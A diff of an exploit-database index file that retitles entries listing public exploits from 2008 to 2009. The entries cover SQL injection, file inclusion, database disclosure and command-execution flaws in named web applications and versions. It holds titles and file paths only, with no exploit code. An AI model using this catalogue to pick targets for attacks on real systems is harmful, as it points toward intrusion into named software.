-7294,platforms/php/webapps/7294.pl,"Lito Lite CMS - 'cate.php cid' SQL Injection",2008-11-29,"CWH Underground",php,webapps,0
+7294,platforms/php/webapps/7294.pl,"Lito Lite CMS - 'cid' Parameter SQL Injection",2008-11-29,"CWH Underground",php,webapps,0
-7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - 'QuizID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
+7295,platforms/asp/webapps/7295.txt,"Active Test 2.1 - 'QuizID' Parameter Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0
-7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0
+7298,platforms/php/webapps/7298.txt,"Active Web Helpdesk 2 - 'categoryId' Parameter Blind SQL Injection",2008-11-30,Cyber-Zone,php,webapps,0
-7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 - (Authentication Bypass) SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0
+7299,platforms/php/webapps/7299.txt,"Active Photo Gallery 6.2 - Authentication Bypass",2008-11-30,R3d-D3V!L,php,webapps,0
-7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 - (Authentication Bypass) SQL Injection",2008-11-30,AlpHaNiX,php,webapps,0
+7301,platforms/php/webapps/7301.txt,"Active Time Billing 3.2 - Authentication Bypass",2008-11-30,AlpHaNiX,php,webapps,0
 7302,platforms/php/webapps/7302.txt,"Active Business Directory 2 - Blind SQL Injection",2008-11-30,AlpHaNiX,php,webapps,0
-7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 - (qtv.mdb) Database Disclosure",2008-11-30,Cyber-Zone,php,webapps,0
+7303,platforms/php/webapps/7303.txt,"Quick Tree View .NET 3.1 - Database Disclosure",2008-11-30,Cyber-Zone,php,webapps,0
 7304,platforms/php/webapps/7304.pl,"KTP Computer Customer Database CMS 1.0 - Local File Inclusion",2008-11-30,"CWH Underground",php,webapps,0
 7305,platforms/php/webapps/7305.txt,"KTP Computer Customer Database CMS 1.0 - Blind SQL Injection",2008-11-30,"CWH Underground",php,webapps,0
 7306,platforms/php/webapps/7306.txt,"minimal ablog 0.4 - SQL Injection / Arbitrary File Upload / Authentication Bypass",2008-11-30,NoGe,php,webapps,0
 7308,platforms/php/webapps/7308.txt,"CPCommerce 1.2.6 - (URL Rewrite) Input Variable Overwrite / Authentication Bypass",2008-11-30,girex,php,webapps,0
 7310,platforms/php/webapps/7310.txt,"Broadcast Machine 0.1 - Multiple Remote File Inclusion",2008-11-30,NoGe,php,webapps,0
-7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - (edit.php site) SQL Injection",2008-12-01,JIKO,php,webapps,0
+7311,platforms/php/webapps/7311.txt,"z1exchange 1.0 - 'site' Parameter SQL Injection",2008-12-01,JIKO,php,webapps,0
 7312,platforms/php/webapps/7312.txt,"Andy's PHP KnowledgeBase 0.92.9 - Arbitrary File Upload",2008-12-01,"CWH Underground",php,webapps,0
-7315,platforms/php/webapps/7315.txt,"E.Z. Poll 2 - (Authentication Bypass) SQL Injection",2008-12-01,t0fx,php,webapps,0
+7315,platforms/php/webapps/7315.txt,"E.Z. Poll 2 - Authentication Bypass",2008-12-01,t0fx,php,webapps,0
-7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 - (ASPPortal.mdb) Database Disclosure",2008-12-01,"CWH Underground",asp,webapps,0
+7316,platforms/asp/webapps/7316.txt,"ASPPortal 3.2.5 - Database Disclosure",2008-12-01,"CWH Underground",asp,webapps,0
-7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 - (viewcat.php cid) SQL Injection",2008-12-01,"CWH Underground",php,webapps,0
+7317,platforms/php/webapps/7317.pl,"bcoos 1.0.13 - 'viewcat.php' SQL Injection",2008-12-01,"CWH Underground",php,webapps,0
-7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 - (poll.mdb/poll97.mdb) Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0
+7318,platforms/php/webapps/7318.txt,"PacPoll 4.0 - Database Disclosure",2008-12-01,AlpHaNiX,php,webapps,0
 7319,platforms/php/webapps/7319.txt,"Ocean12 Mailing List Manager Gold - File Disclosure / SQL Injection / Cross-Site Scripting",2008-12-02,Pouya_Server,php,webapps,0
 7322,platforms/php/webapps/7322.pl,"CMS MAXSITE Component Guestbook - Remote Command Execution",2008-12-02,"CWH Underground",php,webapps,0
-7323,platforms/php/webapps/7323.txt,"SunByte e-Flower - 'id' SQL Injection",2008-12-02,w4rl0ck,php,webapps,0
+7323,platforms/php/webapps/7323.txt,"SunByte e-Flower - 'id' Parameter SQL Injection",2008-12-02,w4rl0ck,php,webapps,0
-7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 - (cldb.mdb) Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0
+7324,platforms/php/webapps/7324.txt,"Rapid Classified 3.1 - Database Disclosure",2008-12-02,CoBRa_21,php,webapps,0
-7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro (MailingList.mdb) - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps,0
+7325,platforms/asp/webapps/7325.txt,"Codefixer MailingListPro - Database Disclosure",2008-12-02,AlpHaNiX,asp,webapps,0
-7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 - (pics_pre.asp ID) Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0
+7326,platforms/asp/webapps/7326.txt,"Gallery MX 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0
 7327,platforms/asp/webapps/7327.txt,"Calendar MX Professional 2.0.0 - Blind SQL Injection",2008-12-03,R3d-D3V!L,asp,webapps,0
-7328,platforms/php/webapps/7328.pl,"Check New 4.52 - 'findoffice.php search' SQL Injection",2008-12-03,"CWH Underground",php,webapps,0
+7328,platforms/php/webapps/7328.pl,"Check New 4.52 - SQL Injection",2008-12-03,"CWH Underground",php,webapps,0
-7331,platforms/php/webapps/7331.pl,"Joomla! Component com_jmovies 1.1 - 'id' SQL Injection",2008-12-03,StAkeR,php,webapps,0
+7331,platforms/php/webapps/7331.pl,"Joomla! Component JMovies 1.1 - 'id' Parameter SQL Injection",2008-12-03,StAkeR,php,webapps,0
 7332,platforms/php/webapps/7332.txt,"ASP User Engine .NET - Remote Database Disclosure",2008-12-03,AlpHaNiX,php,webapps,0
-7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS - (Authentication Bypass) SQL Injection",2008-12-03,b3hz4d,php,webapps,0
+7333,platforms/php/webapps/7333.txt,"Rae Media Contact MS - Authentication Bypass",2008-12-03,b3hz4d,php,webapps,0
-7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - (pfad) Remote File Inclusion",2008-12-03,NoGe,php,webapps,0
+7335,platforms/php/webapps/7335.txt,"Multi SEO phpBB 1.1.0 - Remote File Inclusion",2008-12-03,NoGe,php,webapps,0
-7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - (cct_base) Multiple Remote File Inclusion",2008-12-04,cOndemned,php,webapps,0
+7336,platforms/php/webapps/7336.txt,"ccTiddly 1.7.4 - 'cct_base' Parameter Remote File Inclusion",2008-12-04,cOndemned,php,webapps,0
 7337,platforms/php/webapps/7337.txt,"wbstreet 1.0 - SQL Injection / File Disclosure",2008-12-04,"CWH Underground",php,webapps,0
 7338,platforms/php/webapps/7338.txt,"User Engine Lite ASP - 'users.mdb' Database Disclosure",2008-12-04,AlpHaNiX,php,webapps,0
 7339,platforms/php/webapps/7339.txt,"template creature - SQL Injection / File Disclosure",2008-12-04,ZoRLu,php,webapps,0
-7340,platforms/asp/webapps/7340.txt,"Easy News Content Management - 'News.mdb' Database Disclosure",2008-12-04,BeyazKurt,asp,webapps,0
+7340,platforms/asp/webapps/7340.txt,"Easy News Content Management - Database Disclosure",2008-12-04,BeyazKurt,asp,webapps,0
 7341,platforms/php/webapps/7341.txt,"lcxbbportal 0.1 alpha 2 - Remote File Inclusion",2008-12-04,NoGe,php,webapps,0
-7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 - (index.php action) Local File Inclusion",2008-12-04,cOndemned,php,webapps,0
+7342,platforms/php/webapps/7342.txt,"My Simple Forum 3.0 - Local File Inclusion",2008-12-04,cOndemned,php,webapps,0
-7343,platforms/php/webapps/7343.txt,"Joomla! Component mydyngallery 1.4.2 - (Directory) SQL Injection",2008-12-04,"Khashayar Fereidani",php,webapps,0
+7343,platforms/php/webapps/7343.txt,"Joomla! Component mydyngallery 1.4.2 - SQL Injection",2008-12-04,"Khashayar Fereidani",php,webapps,0
-7344,platforms/php/webapps/7344.txt,"Gravity GTD 0.4.5 - (rpc.php objectname) Local File Inclusion / Remote Code Execution",2008-12-04,dun,php,webapps,0
+7344,platforms/php/webapps/7344.txt,"Gravity GTD 0.4.5 - Local File Inclusion / Remote Code Execution",2008-12-04,dun,php,webapps,0
 7345,platforms/php/webapps/7345.txt,"BNCwi 1.04 - Local File Inclusion",2008-12-04,dun,php,webapps,0
 7346,platforms/php/webapps/7346.txt,"Multiple Membership Script 2.5 - 'id' SQL Injection",2008-12-05,ViRuS_HaCkErS,php,webapps,0
 7348,platforms/asp/webapps/7348.txt,"merlix educate servert - Authentication Bypass / File Disclosure",2008-12-05,ZoRLu,asp,webapps,0
-7349,platforms/asp/webapps/7349.txt,"RankEm - 'rankup.asp siteID' SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0
+7349,platforms/asp/webapps/7349.txt,"RankEm - 'siteID' Parameter SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0
-7350,platforms/asp/webapps/7350.txt,"RankEm - (Authentication Bypass) SQL Injection",2008-12-05,AlpHaNiX,asp,webapps,0
+7350,platforms/asp/webapps/7350.txt,"Rankem - Authentication Bypass",2008-12-05,AlpHaNiX,asp,webapps,0
 7351,platforms/php/webapps/7351.txt,"nightfall personal diary 1.0 - Cross-Site Scripting / File Disclosure",2008-12-05,AlpHaNiX,php,webapps,0
-7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - (File Disclosure/Bypass) Multiple Remote Vulnerabilities",2008-12-05,ZoRLu,php,webapps,0
+7352,platforms/php/webapps/7352.txt,"Merlix Teamworx Server - File Disclosure/Bypass",2008-12-05,ZoRLu,php,webapps,0
-7353,platforms/asp/webapps/7353.txt,"Cold BBS - 'cforum.mdb' Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0
+7353,platforms/asp/webapps/7353.txt,"Cold BBS - Remote Database Disclosure",2008-12-05,ahmadbady,asp,webapps,0
-7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator .v.3 - Insecure Upload",2008-12-05,ahmadbady,php,webapps,0
+7354,platforms/php/webapps/7354.txt,"Tizag Countdown Creator 3 - Insecure Upload",2008-12-05,ahmadbady,php,webapps,0
 7356,platforms/asp/webapps/7356.txt,"ASP AutoDealer - SQL Injection / File Disclosure",2008-12-05,AlpHaNiX,asp,webapps,0
-7357,platforms/asp/webapps/7357.txt,"ASP PORTAL - Multiple SQL Injections",2008-12-05,AlpHaNiX,asp,webapps,0
+7357,platforms/asp/webapps/7357.txt,"ASP Portal - Multiple SQL Injections",2008-12-05,AlpHaNiX,asp,webapps,0
-7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - (news.mdb) Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0
+7359,platforms/asp/webapps/7359.txt,"ASPTicker 1.0 - Remote Database Disclosure",2008-12-05,ZoRLu,asp,webapps,0
 7360,platforms/asp/webapps/7360.txt,"ASP AutoDealer - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0
-7361,platforms/asp/webapps/7361.txt,"ASP PORTAL - 'xportal.mdb' Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0
+7361,platforms/asp/webapps/7361.txt,"ASP PORTAL - Remote Database Disclosure",2008-12-06,ZoRLu,asp,webapps,0
-7363,platforms/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - (_language) Local File Inclusion",2008-12-06,dun,php,webapps,0
+7363,platforms/php/webapps/7363.txt,"phpPgAdmin 4.2.1 - '_language' Parameter Local File Inclusion",2008-12-06,dun,php,webapps,0
 7364,platforms/php/webapps/7364.php,"IPNPro3 <= 1.44 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0
 7365,platforms/php/webapps/7365.php,"DL PayCart 1.34 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0
 7366,platforms/php/webapps/7366.php,"Bonza Cart 1.10 - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0
-7367,platforms/php/webapps/7367.php,"PayPal eStore - Admin Password Changing Exploit",2008-12-07,G4N0K,php,webapps,0
+7367,platforms/php/webapps/7367.php,"PayPal eStore - Admin Password Change",2008-12-07,G4N0K,php,webapps,0
-7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b - (forum_topic_id) SQL Injection",2008-12-07,b3hz4d,php,webapps,0
+7368,platforms/php/webapps/7368.txt,"Product Sale Framework 0.1b - SQL Injection",2008-12-07,b3hz4d,php,webapps,0
 7369,platforms/php/webapps/7369.pl,"w3blabor CMS 3.0.5 - Arbitrary File Upload / Local File Inclusion",2008-12-07,DNX,php,webapps,0
 7370,platforms/asp/webapps/7370.txt,"Natterchat 1.12 - Database Disclosure",2008-12-07,AlpHaNiX,asp,webapps,0
 7371,platforms/asp/webapps/7371.txt,"Professional Download Assistant 0.1 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
 7372,platforms/asp/webapps/7372.txt,"Ikon ADManager 2.1 - Remote Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
 7373,platforms/asp/webapps/7373.txt,"aspmanage banners - Arbitrary File Upload / File Disclosure",2008-12-07,ZoRLu,asp,webapps,0
 7374,platforms/php/webapps/7374.txt,"Mini Blog 1.0.1 - 'index.php' Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0
-7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 - 'index.php' Multiple Local File Inclusion",2008-12-07,cOndemned,php,webapps,0
+7375,platforms/php/webapps/7375.txt,"Mini-CMS 1.0.1 - 'index.php' Local File Inclusion",2008-12-07,cOndemned,php,webapps,0
 7376,platforms/asp/webapps/7376.txt,"QMail Mailing List Manager 1.2 - Database Disclosure",2008-12-07,"Ghost Hacker",asp,webapps,0
 7377,platforms/php/webapps/7377.txt,"PHPmyGallery Gold 1.51 - 'index.php' Directory Traversal",2008-12-07,zAx,php,webapps,0
 7378,platforms/asp/webapps/7378.txt,"asp talk - SQL Injection / Cross-Site Scripting",2008-12-07,Bl@ckbe@rD,asp,webapps,0
-7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - 'Filename' Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0
+7379,platforms/php/webapps/7379.txt,"MG2 0.5.1 - 'filename' Parameter Remote Code Execution",2008-12-08,"Alfons Luja",php,webapps,0
 7380,platforms/php/webapps/7380.txt,"XOOPS 2.3.1 - Multiple Local File Inclusion",2008-12-08,DSecRG,php,webapps,0
 7381,platforms/php/webapps/7381.txt,"siu guarani - Multiple Vulnerabilities",2008-12-08,"Ubik & proudhon",php,webapps,0
 7382,platforms/php/webapps/7382.txt,"phpMyAdmin 3.1.0 - Cross-Site Request Forgery / SQL Injection",2008-12-08,"Michael Brooks",php,webapps,0
@@ -20198,18 +20199,18 @@ id,file,description,date,author,platform,type,port
 7385,platforms/php/webapps/7385.txt,"vBulletin Secure Downloads 2.0.0r - SQL Injection",2008-12-08,Cnaph,php,webapps,0
 7386,platforms/php/webapps/7386.pl,"phpBB 3 - (Mod Tag Board 4) Blind SQL Injection",2008-12-08,StAkeR,php,webapps,0
 7388,platforms/php/webapps/7388.txt,"webcaf 1.4 - Local File Inclusion / Remote Code Execution",2008-12-08,dun,php,webapps,0
-7390,platforms/asp/webapps/7390.txt,"dotnetindex Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection",2008-12-09,ZoRLu,asp,webapps,0
+7390,platforms/asp/webapps/7390.txt,"Professional Download Assistant 0.1 - Authentication Bypass",2008-12-09,ZoRLu,asp,webapps,0
-7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - (Authentication Bypass) SQL Injection",2008-12-09,AlpHaNiX,asp,webapps,0
+7391,platforms/asp/webapps/7391.txt,"Poll Pro 2.0 - Authentication Bypass",2008-12-09,AlpHaNiX,asp,webapps,0
 7392,platforms/php/webapps/7392.txt,"PHPmyGallery 1.0beta2 - Remote File Inclusion / Local File Inclusion",2008-12-09,ZoRLu,php,webapps,0
-7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - (index.php rubid) SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0
+7395,platforms/php/webapps/7395.txt,"Peel Shopping 3.1 - 'rubid' Parameter SQL Injection",2008-12-09,SuB-ZeRo,php,webapps,0
 7396,platforms/php/webapps/7396.txt,"Netref 4.0 - Multiple SQL Injections",2008-12-09,SuB-ZeRo,php,webapps,0
-7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 - (Authentication Bypass) SQL Injection",2008-12-09,Osirys,php,webapps,0
+7397,platforms/php/webapps/7397.txt,"ProQuiz 1.0 - Authentication Bypass",2008-12-09,Osirys,php,webapps,0
 7398,platforms/asp/webapps/7398.txt,"postecards - SQL Injection / File Disclosure",2008-12-09,AlpHaNiX,asp,webapps,0
-7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta - (common-tpl-vars.php) Local File Inclusion / Remote File Inclusion",2008-12-09,CoBRa_21,php,webapps,0
+7399,platforms/php/webapps/7399.txt,"PHPmyGallery 1.5beta - 'common-tpl-vars.php' Local / Remote File Inclusion",2008-12-09,CoBRa_21,php,webapps,0
 7400,platforms/php/webapps/7400.txt,"PHP Multiple Newsletters 2.7 - Local File Inclusion / Cross-Site Scripting",2008-12-09,ahmadbady,php,webapps,0
-7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - (htmpl_admin.cgi help) Command Execution",2008-12-10,ZeN,cgi,webapps,0
+7404,platforms/cgi/webapps/7404.txt,"HTMPL 1.11 - Command Execution",2008-12-10,ZeN,cgi,webapps,0
-7406,platforms/php/webapps/7406.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation",2008-12-10,s4avrd0w,php,webapps,0
+7406,platforms/php/webapps/7406.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation",2008-12-10,s4avrd0w,php,webapps,0
-7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - 'member.php u' SQL Injection",2008-12-10,"Hussin X",php,webapps,0
+7407,platforms/php/webapps/7407.txt,"WebMaster Marketplace - SQL Injection",2008-12-10,"Hussin X",php,webapps,0
 7408,platforms/php/webapps/7408.txt,"living Local 1.1 - Cross-Site Scripting / Arbitrary File Upload",2008-12-10,Bgh7,php,webapps,0
 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 - Cross-Site Scripting / Cross-Site Request Forgery",2008-12-10,ZynbER,php,webapps,0
 7411,platforms/php/webapps/7411.txt,"Butterfly ORGanizer 2.0.1 - 'id' Parameter SQL Injection",2008-12-10,Osirys,php,webapps,0
@@ -20222,7 +20223,7 @@ id,file,description,date,author,platform,type,port
 7418,platforms/php/webapps/7418.txt,"PhpAddEdit 1.3 - 'cookie' Login Bypass",2008-12-11,x0r,php,webapps,0
 7419,platforms/asp/webapps/7419.txt,"evCal Events Calendar - Database Disclosure",2008-12-11,Cyber-Zone,asp,webapps,0
 7420,platforms/asp/webapps/7420.txt,"MyCal Personal Events Calendar - 'mycal.mdb' Database Disclosure",2008-12-11,CoBRa_21,asp,webapps,0
-7421,platforms/php/webapps/7421.txt,"eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0
+7421,platforms/php/webapps/7421.txt,"EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required)",2008-12-11,s4avrd0w,php,webapps,0
 7422,platforms/php/webapps/7422.txt,"Feed CMS 1.07.03.19b - 'lang' Local File Inclusion",2008-12-11,x0r,php,webapps,0
 7423,platforms/asp/webapps/7423.txt,"Affiliate Software Java 4.0 - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0
 7424,platforms/asp/webapps/7424.txt,"Ad Management Java - (Authentication Bypass) SQL Injection",2008-12-11,R3d-D3V!L,asp,webapps,0
@@ -20268,7 +20269,7 @@ id,file,description,date,author,platform,type,port
 7470,platforms/asp/webapps/7470.txt,"CodeAvalanche FreeWallpaper - Remote Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
 7471,platforms/asp/webapps/7471.txt,"CodeAvalanche Articles - 'CAArticles.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
 7472,platforms/asp/webapps/7472.txt,"CodeAvalanche RateMySite - 'CARateMySite.mdb' Database Disclosure",2008-12-15,Pouya_Server,asp,webapps,0
-7473,platforms/php/webapps/7473.php,"eZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0
+7473,platforms/php/webapps/7473.php,"EZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation",2008-12-15,s4avrd0w,php,webapps,0
 7474,platforms/php/webapps/7474.txt,"FLDS 1.2a - (lpro.php id) SQL Injection",2008-12-15,nuclear,php,webapps,0
 7475,platforms/php/webapps/7475.txt,"BabbleBoard 1.1.6 - 'Username' Cross-Site Request Forgery/Cookie Grabber Exploit",2008-12-15,SirGod,php,webapps,0
 7476,platforms/php/webapps/7476.txt,"Mediatheka 4.2 - Blind SQL Injection",2008-12-15,StAkeR,php,webapps,0
@@ -20308,7 +20309,7 @@ id,file,description,date,author,platform,type,port
 7518,platforms/php/webapps/7518.txt,"Gobbl CMS 1.0 - Insecure Cookie Handling",2008-12-18,x0r,php,webapps,0
 7519,platforms/php/webapps/7519.txt,"MyPHPsite - 'index.php mod' Local File Inclusion",2008-12-18,Piker,php,webapps,0
 7522,platforms/php/webapps/7522.pl,"MyPBS - 'index.php seasonID' SQL Injection",2008-12-19,Piker,php,webapps,0
-7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Changing Exploit",2008-12-19,G4N0K,php,webapps,0
+7523,platforms/php/webapps/7523.php,"ReVou Twitter Clone - Admin Password Change",2008-12-19,G4N0K,php,webapps,0
 7524,platforms/php/webapps/7524.txt,"Online Keyword Research Tool - 'download.php' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0
 7525,platforms/php/webapps/7525.txt,"Extract Website - 'download.php Filename' File Disclosure",2008-12-19,"Cold Zero",php,webapps,0
 7526,platforms/php/webapps/7526.txt,"myPHPscripts Login Session 2.0 - Cross-Site Scripting / Database Disclosure",2008-12-19,Osirys,php,webapps,0
@@ -20393,7 +20394,7 @@ id,file,description,date,author,platform,type,port
 7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0
 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote Arbitrary .PHP File Upload",2009-01-01,Lo$er,php,webapps,0
 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0
-7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - (Authentication Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0
+7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - Authentication Bypass",2009-01-01,DNX,php,webapps,0
 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - 'newsid' Parameter SQL Injection",2009-01-01,"Virangar Security",php,webapps,0
 7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - (Authentication Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0
 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0
@@ -20495,7 +20496,7 @@ id,file,description,date,author,platform,type,port
 7801,platforms/asp/webapps/7801.txt,"eReservations - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
 7802,platforms/asp/webapps/7802.txt,"The Walking Club - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
 7803,platforms/asp/webapps/7803.txt,"Ping IP - (Authentication Bypass) SQL Injection",2009-01-16,ByALBAYX,asp,webapps,0
-7805,platforms/php/webapps/7805.txt,"rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,php,webapps,0
+7805,platforms/php/webapps/7805.txt,"Rankem - File Disclosure / Cross-Site Scripting / Cookie",2009-01-16,Pouya_Server,php,webapps,0
 7806,platforms/php/webapps/7806.txt,"blogit! - SQL Injection / File Disclosure / Cross-Site Scripting",2009-01-16,Pouya_Server,php,webapps,0
 7807,platforms/asp/webapps/7807.txt,"ASP ActionCalendar 1.3 - (Authentication Bypass) SQL Injection",2009-01-16,SuB-ZeRo,asp,webapps,0
 7809,platforms/php/webapps/7809.txt,"Aj Classifieds Real Estate 3.0 - Arbitrary File Upload",2009-01-16,ZoRLu,php,webapps,0
@@ -20569,7 +20570,7 @@ id,file,description,date,author,platform,type,port
 7917,platforms/php/webapps/7917.php,"PLE CMS 1.0 Beta 4.2 - (login.php school) Blind SQL Injection",2009-01-29,darkjoker,php,webapps,0
 7922,platforms/php/webapps/7922.txt,"Pligg 9.9.5 - Cross-Site Request Forgery / Protection Bypass / Captcha Bypass",2009-01-29,"Michael Brooks",php,webapps,0
 7924,platforms/asp/webapps/7924.txt,"SalesCart - (Authentication Bypass) SQL Injection",2009-01-30,ByALBAYX,asp,webapps,0
-7925,platforms/php/webapps/7925.txt,"revou twitter clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0
+7925,platforms/php/webapps/7925.txt,"Revou Twitter Clone - Cross-Site Scripting / SQL Injection",2009-01-30,nuclear,php,webapps,0
 7927,platforms/php/webapps/7927.txt,"GNUBoard 4.31.04 - (09.01.30) Multiple Local+Remote Vulnerabilities",2009-01-30,make0day,php,webapps,0
 7930,platforms/php/webapps/7930.txt,"bpautosales 1.0.1 - Cross-Site Scripting / SQL Injection",2009-01-30,"Mehmet Ince",php,webapps,0
 7931,platforms/php/webapps/7931.txt,"Orca 2.0.2 - 'topic ' Cross-Site Scripting",2009-01-30,J-Hacker,php,webapps,0
@@ -20781,7 +20782,7 @@ id,file,description,date,author,platform,type,port
 8293,platforms/php/webapps/8293.txt,"Free PHP Petition Signing Script - (Authentication Bypass) SQL Injection",2009-03-27,Qabandi,php,webapps,0
 8296,platforms/php/webapps/8296.txt,"Arcadwy Arcade Script - 'Username' Static Cross-Site Scripting",2009-03-27,"Anarchy Angel",php,webapps,0
 8297,platforms/php/webapps/8297.txt,"Moodle < 1.6.9/1.7.7/1.8.9/1.9.5 - File Disclosure",2009-03-27,"Christian J. Eibl",php,webapps,0
-8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - (Local File Inclusion) Remote Command Execution",2009-03-27,Osirys,php,webapps,0
+8298,platforms/php/webapps/8298.pl,"My Simple Forum 7.1 - Remote Command Execution",2009-03-27,Osirys,php,webapps,0
 8302,platforms/php/webapps/8302.php,"glFusion 1.1.2 - COM_applyFilter()/order SQL Injection",2009-03-29,Nine:Situations:Group,php,webapps,0
 8304,platforms/php/webapps/8304.txt,"Arcadwy Arcade Script - (Authentication Bypass) Insecure Cookie Handling",2009-03-29,ZoRLu,php,webapps,0
 8305,platforms/php/webapps/8305.txt,"iWare CMS 5.0.4 - Multiple SQL Injections",2009-03-29,boom3rang,php,webapps,0
@@ -21451,7 +21452,7 @@ id,file,description,date,author,platform,type,port
 9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,php,webapps,0
 9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - (Authentication Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0
 9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0
-9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - (page.php id) SQL Injection",2009-08-10,Ins3t,php,webapps,0
+9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - 'page.php' SQL Injection",2009-08-10,Ins3t,php,webapps,0
 9407,platforms/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0
 9408,platforms/php/webapps/9408.php,"Joomla! Component Kunena Forums (com_kunena) - Blind SQL Injection",2009-08-10,"ilker Kandemir",php,webapps,0
 9410,platforms/php/webapps/9410.txt,"WordPress 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié",php,webapps,0
@@ -21904,7 +21905,7 @@ id,file,description,date,author,platform,type,port
 10498,platforms/php/webapps/10498.txt,"Pre Hospital Management System - 'department.php id' SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
 10499,platforms/php/webapps/10499.txt,"eUploader PRO 3.1.1 - Cross-Site Request Forgery / Cross-Site Scripting",2009-12-16,"Milos Zivanovic",php,webapps,0
 10500,platforms/php/webapps/10500.txt,"Omnistar Affiliate - (Authentication Bypass) SQL Injection",2009-12-16,R3d-D3V!L,php,webapps,0
